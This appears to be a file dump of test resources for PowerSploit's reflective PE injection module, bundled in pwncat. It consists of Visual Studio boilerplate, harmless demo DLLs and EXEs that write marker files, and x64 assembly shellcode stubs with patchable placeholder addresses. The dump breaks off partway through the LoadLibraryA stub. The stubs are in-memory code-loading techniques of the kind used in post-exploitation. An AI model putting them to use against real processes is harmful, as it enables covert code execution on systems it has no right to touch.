7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
// DLL entry point. The demo needs no per-process or per-thread setup or
// teardown, so every attach/detach notification is acknowledged and ignored;
// returning TRUE lets the loader proceed.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
	(void)hModule;
	(void)ul_reason_for_call;
	(void)lpReserved;
	return TRUE;
}
19 |
20 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
// Exported, unmangled test entry point called by the reflective-loader harness.
// It records that the call happened by writing a marker file under a fixed
// directory at the drive root. The fixed path is a test-only convenience; it
// is not a safe location for real output.
extern "C" __declspec(dllexport) void VoidFunc();

extern "C" __declspec(dllexport) void VoidFunc()
{
    // The directory may already exist, so the result is deliberately ignored.
    (void)_mkdir("c:\\ReflectiveLoaderTest");

    // Opened by the constructor and closed by the destructor at scope exit.
    ofstream marker("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
    marker << "Dll Void function successfully called.\n";
}
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
// DLL entry point for the remote-process injection test.
//
// On DLL_PROCESS_ATTACH it writes a marker file so the harness can confirm
// that DllMain ran; the other reason codes are ignored.
//
// Note: file I/O here executes while the loader lock is held, which is
// discouraged for real DLLs; it is tolerated only because this is a test
// artifact. The fixed drive-root path is likewise test-only.
//
// hModule            handle of this module (unused)
// ul_reason_for_call why the loader invoked us
// lpReserved         reserved by the loader (unused)
// Returns TRUE for every reason code.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        // The directory may already exist; the result is deliberately ignored.
        (void)_mkdir("c:\\ReflectiveLoaderTest");

        // Opened by the constructor, closed by the destructor at scope exit.
        ofstream marker("c:\\ReflectiveLoaderTest\\DllMain.txt");
        marker << "DllMain successfully called.\n";
    }

    return TRUE;
}
28 |
29 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
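// Console entry point for the reflective-loading demo: echo argc and every
// argv entry so the harness can verify that arguments were passed through.
//
// argc  number of arguments
// argv  argument vector in the build's character width (_TCHAR)
// Returns 0.
int _tmain(int argc, _TCHAR* argv[])
{
    printf("Exe loaded! Printing argc and argv\n\n");

    printf("Argc: %d\n", argc);
    // %p is the conversion for a pointer; %d truncates the value on x64 and
    // is undefined behaviour for a pointer argument.
    printf("ArgvAddress: %p\n", (void*)argv);

    for (int i = 0; i < argc; i++)
    {
        // _tprintf/_T follow _TCHAR, so the format width matches argv in
        // both ANSI and UNICODE builds; wprintf with %s is only correct
        // when _TCHAR is wchar_t.
        _tprintf(_T("Argv: %s\n"), argv[i]);
    }

    printf("Exiting exe\n");

    return 0;
}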
25 |
26 |
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
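// Console entry point for the reflective-loading demo (debug-CRT build):
// echo argc and every argv entry so the harness can verify that arguments
// were passed through.
//
// argc  number of arguments
// argv  argument vector in the build's character width (_TCHAR)
// Returns 0.
int _tmain(int argc, _TCHAR* argv[])
{
    printf("Exe loaded! Printing argc and argv\n\n");

    printf("Argc: %d\n", argc);
    // %p is the conversion for a pointer; %d truncates the value on x64 and
    // is undefined behaviour for a pointer argument.
    printf("ArgvAddress: %p\n", (void*)argv);

    for (int i = 0; i < argc; i++)
    {
        // _tprintf/_T follow _TCHAR, so the format width matches argv in
        // both ANSI and UNICODE builds; wprintf with %s is only correct
        // when _TCHAR is wchar_t.
        _tprintf(_T("Argv: %s\n"), argv[i]);
    }

    printf("Exiting exe\n");

    return 0;
}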
25 |
26 |
27 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
// Console entry point for the test target process: block on stdin so the
// process stays alive until a key is pressed, then exit cleanly.
//
// argc/argv are accepted for the standard signature but not used.
// Returns 0.
int _tmain(int argc, _TCHAR* argv[])
{
    (void)argc;
    (void)argv;

    fputs("Press enter to close.\n", stdout);
    (void)getchar(); // the character read is irrelevant; only the wait matters

    return 0;
}
16 |
17 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included because I didn't save it; this should just be for the SUPER easy stuff like moving an address to EAX and returning.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
; x64 stub that invokes a loaded DLL's DllMain with DLL_PROCESS_ATTACH.
; The 0x4141... immediates are placeholders; the PowerShell side is
; expected to overwrite them in place before running the stub, so their
; positions in the encoded bytes are part of the contract.
[SECTION .text]
global _start

_start:
    ; Get stack setup
    push rbx
    mov rbx, rsp                ; rbx keeps the caller's rsp for the restore below
    and sp, 0xff00              ; clears only the low byte of rsp (moves it down by up to 255 bytes)

    ; Call DllMain: Win64 convention passes the first three args in rcx, rdx, r8
    mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell
    mov rdx, 0x1                ; PROCESS_ATTACH
    mov r8, 0x0                 ; NULL
    mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
    call rax

    ; Fix stack
    mov rsp, rbx
    pop rbx
    ret
21 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
; x64 stub run when an injected EXE finishes: flags completion to the
; PowerShell side, then terminates only the current thread so the host
; process keeps running. Control never returns from the final call.
; The 0x4141... immediates are placeholders filled in by PowerShell.
[SECTION .text]

global _start

_start:
    ; Set a var to 1, let PS know the EXE is exiting
    mov rbx, 0x4141414141414141 ; address of the flag byte, set by PS
    mov [rbx], byte 0x01

    ; Call exitthread instead of exitprocess
    sub rsp, 0xc0
    and sp, 0xFFf0              ; Needed for stack alignment (clears the low 4 bits of rsp)
    mov rbx, 0x4141414141414141 ; address of the exit-thread routine, set by PS
    call rbx
15 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
; x64 stub that resolves an export by name through GetProcAddress and
; writes the resulting address into a buffer for the PowerShell side to
; read back. The 0x4141... immediates are placeholders filled in by PowerShell.
[SECTION .text]

global _start

_start:
    ; Save state of rbx and stack
    push rbx
    mov rbx, rsp                ; rbx keeps the caller's rsp for the restore below

    ; Set up stack for function call to GetProcAddress
    sub rsp, 0x20               ; 32 bytes of shadow space for the Win64 convention
    and sp, 0xffc0              ; clears the low 6 bits of rsp (64-byte alignment)

    ; Call getprocaddress (hModule in rcx, lpProcName in rdx)
    mov rcx, 0x4141414141414141 ; DllHandle, set by PS
    mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS
    mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
    call rax

    ; Store the result (rax holds the resolved address, or NULL on failure)
    mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
    mov [rcx], rax

    ; Restore stack
    mov rsp, rbx
    pop rbx
    ret
28 |
--------------------------------------------------------------------------------
/pwncat/data/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
; x64 stub that loads a library by name through LoadLibraryA and writes
; the returned module handle into a buffer for the PowerShell side to
; read back. The 0x4141... immediates are placeholders filled in by PowerShell.
[SECTION .text]

global _start

_start:
    ; Save rsp and setup stack for function call
    push rbx
